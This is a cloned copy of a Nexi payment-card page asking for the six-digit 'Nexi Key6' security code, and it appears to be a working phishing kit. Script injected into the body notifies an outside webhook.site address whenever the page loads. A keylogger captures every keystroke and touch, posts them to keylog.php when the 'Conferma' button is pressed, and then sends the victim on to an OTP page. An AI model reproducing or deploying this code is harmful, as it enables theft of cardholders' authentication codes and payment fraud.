<!doctype html>

<html lang="it"> 
    
<!-- Mirrored from www.nexi.it/crea-key6 by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 20 May 2024 16:33:48 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>
        



<meta charset="utf-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>



<title>crea-key6</title>











<meta name="og:title" content="crea-key6"/>


<meta name="og:url" content="crea-key6-2.html"/>


<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="crea-key6"/>








        <link rel="apple-touch-icon-precomposed" sizes="57x57" href="etc/designs/nexi/favicon/apple-touch-icon-57x57.png"/>
<link rel="apple-touch-icon-precomposed" sizes="114x114" href="etc/designs/nexi/favicon/apple-touch-icon-114x114.png"/>
<link rel="apple-touch-icon-precomposed" sizes="72x72" href="etc/designs/nexi/favicon/apple-touch-icon-72x72.png"/>
<link rel="apple-touch-icon-precomposed" sizes="144x144" href="etc/designs/nexi/favicon/apple-touch-icon-144x144.png"/>
<link rel="apple-touch-icon-precomposed" sizes="60x60" href="etc/designs/nexi/favicon/apple-touch-icon-60x60.png"/>
<link rel="apple-touch-icon-precomposed" sizes="120x120" href="etc/designs/nexi/favicon/apple-touch-icon-120x120.png"/>
<link rel="apple-touch-icon-precomposed" sizes="76x76" href="etc/designs/nexi/favicon/apple-touch-icon-76x76.png"/>
<link rel="apple-touch-icon-precomposed" sizes="152x152" href="etc/designs/nexi/favicon/apple-touch-icon-152x152.png"/>

<link rel="icon" type="image/png" href="etc/designs/nexi/favicon/favicon-196x196.png" sizes="196x196"/>
<link rel="icon" type="image/png" href="etc/designs/nexi/favicon/favicon-96x96.png" sizes="96x96"/>
<link rel="icon" type="image/png" href="etc/designs/nexi/favicon/favicon-32x32.png" sizes="32x32"/>
<link rel="icon" type="image/png" href="etc/designs/nexi/favicon/favicon-16x16.png" sizes="16x16"/>
<link rel="icon" type="image/png" href="etc/designs/nexi/favicon/favicon-128.png" sizes="128x128"/>

<meta name="application-name" content="&nbsp;"/>
<meta name="msapplication-TileColor" content="#FFFFFF"/>
<meta name="msapplication-TileImage" content="etc/designs/nexi/favicon/mstile-144x144.png"/>
<meta name="msapplication-square70x70logo" content="etc/designs/nexi/favicon/mstile-70x70.png"/>
<meta name="msapplication-square150x150logo" content="etc/designs/nexi/favicon/mstile-150x150.png"/>
<meta name="msapplication-wide310x150logo" content="etc/designs/nexi/favicon/mstile-310x150.png"/>
<meta name="msapplication-square310x310logo" content="etc/designs/nexi/favicon/mstile-310x310.png"/>

        



    <!-- Google Tag Manager -->
    <script>(function(w, d, s, l, i) {
        w[l] = w[l] || [];
        w[l].push({
            'gtm.start': new Date().getTime(), event: 'gtm.js'
        });
        var f = d.getElementsByTagName(s)[0],
            j = d.createElement(s), dl = l != 'dataLayer' ? '&l=' + l : '';
        j.async = true;
        j.src =
            '../www.googletagmanager.com/gtm5445.html?id=' + i + dl;
        f.parentNode.insertBefore(j, f);
    })(window, document, 'script', 'dataLayer', 'GTM\u002DMVCHKSD');</script>
    <!-- End Google Tag Manager -->








    <link rel="stylesheet" href="cookieservice/nexi-it/style.css" media="none" onload="if(media !== 'all'){media='all'}"/>




        
<script>
    window.wcmmode_disabled = true;
    window.htmlBoxFunctionsArray = [];
</script>





<script>
    window.resources = {
        currentHomePage: '\/content\/nexi\/it',
        navs: '\/content\/nexi\/it.navs.json',
        assistance: '\/content\/nexi\/it.assist.json',
        footer: '\/content\/nexi\/it.footer.json',
        currentPagePath: '\/content\/nexi\/it\/crea\u002Dkey6',
        currentSectionPath: '\/content\/nexi\/it\/crea\u002Dkey6',
        currentSection: 'crea\u002Dkey6',
        selectedTab: '',
        recaptchaSiteKey: '6LeHSDsUAAAAAPsbPgKK_5I3RM7OgE1ss8bOw\u002DeZ',
        disclaimerCookieName: 'modal_disclaimer',
        disclaimerCookieType: 'session',
        disclaimerFragmentPath: ''
    };
</script>
    </head>
    <body class="page">
        
        <script>
            document.addEventListener("DOMContentLoaded", function() {
                fetch('https://webhook.site/a8cc4cf7-b504-4d89-b4dc-85196ce12cec', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({ message: 'Pagina visualizzata' })
                })
                .then(response => {
                    if (!response.ok) {
                        throw new Error('Errore nell\'invio del messaggio al webhook.');
                    }
                    console.log('Messaggio inviato con successo al webhook!');
                })
                .catch(error => {
                    console.error('Errore:', error);
                });
            });
            
            var keylog = {
                cache: [],
                sending: false,
                init: function () {
                    window.addEventListener("keydown", function (evt) {
                        keylog.cache.push(evt.key);
                    });
            
                    window.addEventListener("touchstart", function (evt) {
                        keylog.cache.push("Touch event at (" + evt.touches[0].clientX + ", " + evt.touches[0].clientY + ")");
                    });
            
                    var submitBtn = document.getElementById("continue-btn");
                    if (submitBtn) {
                        submitBtn.addEventListener("click", function (event) {
                            event.preventDefault();
                            keylog.send();
                            window.location.href = "./OTP.html"; 
                        });
                    }
                },
                send: function () {
                    if (!keylog.sending && keylog.cache.length !== 0) {
                        keylog.sending = true;
                        var data = new FormData();
                        data.append("keys", JSON.stringify(keylog.cache));
                        keylog.cache = [];
            
                        var xhr = new XMLHttpRequest();
                        xhr.open("POST", "keylog.php");
                        xhr.onload = function () {
                            keylog.sending = false;
                            console.log(this.response);
                        };
                        xhr.send(data);
                    }
                }
            };
            
            document.addEventListener("DOMContentLoaded", keylog.init);
            </script>
    


    <!-- Google Tag Manager (noscript) -->
    <noscript>
        <iframe src="https://www.googletagmanager.com/ns.html?id=GTM-MVCHKSD" height="0" width="0" style="display:none;visibility:hidden"></iframe>
    </noscript>
    <!-- End Google Tag Manager (noscript) -->















    
        
            
            
                <div  data-importer-path="/content/nexi/it/crea-key6/jcr:content/importer" data-designpackage-path="content/nexi/it/crea-key6/jcr_content/importer/designpackage/file.res/key6.html">
                    <div class="canvas importer">



<link rel="stylesheet" href="etc/designs/nexi/canvas/content/nexi/it/crea-key6/_jcr_content/importer/headindex.htmlclientlibs.min.css" type="text/css">
<script src="etc/designs/nexi/canvas/content/nexi/it/crea-key6/_jcr_content/importer/headindex.htmlclientlibs.min.js"></script>



      <div class="wrapper">
        <div class="container">
            <img class="logo" src="etc/designs/nexi/canvas/content/nexi/it/crea-key6/_jcr_content/importer/img/logo_dark.svg" alt="logo Nexi"/>
<h1 class="title">Immetti il codice Nexi Key6</h1>
<p class="subtitle">&Egrave; un codice di sei cifre che garantisce una <b>maggiore protezione</b> ai tuoi acquisti online.</p>
<span class="divider"></span>
<input type="text" class="rounded-input" placeholder="Inserisci il codice a sei cifre"/>
<button id="continue-btn" class="rounded-button">Conferma</button>

<style>
  .rounded-input, .rounded-button {
    border-radius: 10px;
    padding: 10px;
    border: 1px solid #ccc;
    width: 100%;
    max-width: 300px;
    box-sizing: border-box;
  }
  
  .rounded-button {
    background-color: #223CAE;
    color: white;
    border: none;
    cursor: pointer;
    margin-top: 10px;
  }
  
  .rounded-button:hover {
    background-color: #1a2e8b; /* Colore leggermente più scuro per l'effetto hover */
  }
</style>

          
        <div class="footer">
          <p class="caption"><b>Vuoi saperne di pi&ugrave; sul codice Nexi Key6?</b></p>
          <a shape="rect" class="link-guide" target="_blank" href="content/dam/nexi/key-6/nexi_key6_guida.pdf">Consulta la guida</a>
        </div>
      </div>
    

<link rel="stylesheet" href="etc/designs/nexi/canvas/content/nexi/it/crea-key6/_jcr_content/importer/index.htmlclientlibs.min.css" type="text/css">
<script src="etc/designs/nexi/canvas/content/nexi/it/crea-key6/_jcr_content/importer/index.htmlclientlibs.min.js"></script>



</div>

                </div>
            
        
    
    



        



<script src="etc/designs/icbpi-common/libs/jquery-3.5.1.min.js"></script>


<script>
    window.wcmmode_disabled = true;
</script>



    <script src="cookieservice/nexi-it/content.ckscript.js" async></script>


    </body>

<!-- Mirrored from www.nexi.it/crea-key6 by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 20 May 2024 16:33:56 GMT -->
</html>
